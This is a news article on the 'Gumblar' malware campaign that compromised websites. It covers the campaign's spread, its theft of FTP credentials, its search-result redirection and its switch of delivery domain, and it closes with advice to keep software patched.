“Gumblar” web attack spreading fast
A dangerous attack compromising websites is on the prowl. It’s known as “Gumblar”.
A complex new malware attack is setting infection records and raising alarms from security experts.
Known unofficially as ‘Gumblar’ for one of the attack domains, the malware is raising eyebrows and alert levels both for its prolific attack methods and for the danger of its payload.
So how does it work in general terms?
What’s the cause for concern?
First detected in late March, researchers thought that the attacks had been halted by mid-April when Google delisted the offending sites.
However, a new variant on the attack arose early this month and has since enjoyed nearly unprecedented success. Security firm ScanSafe estimates that Gumblar attacks have jumped some 188 per cent over the last week alone, and Sophos credits Gumblar with up to 42 per cent of all malware infections in the last seven days.
“The gross infection rate is exceptional, especially this late in the game,” said Mary Landesman, senior security researcher at ScanSafe.
“Basically, it has been enjoying free reign.”
Why the concern regarding the malware payload?
The malware intercepts web traffic such as Google search requests and redirects it to present fraudulent results, allowing the attackers to collect referral fees and placing the user at risk for further infection.
The malware contains botnet controllers and is programmed to collect all FTP permissions on the infected systems, allowing Gumblar to infect any sites which the user administrates, further fostering the spread to new domains.
To make matters worse for security administrators the creators have altered the scripting and are launching it from a new domain.
Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks’ malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.
“They have slightly modified the script and now inject a new version that loads malicious content from a new domain,” Unmask Parasites said in the advisory.
Changes to the script make it more difficult to identify and stop detection by the Google Chrome browser, Unmask Parasites said.
It is spread in typical fashion, via vulnerabilities.
The scripts attempt to exploit vulnerabilities in Adobe’s Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.
In other words to avoid being infected by this malware make sure to keep your systems updated so vulnerabilities can’t be exploited.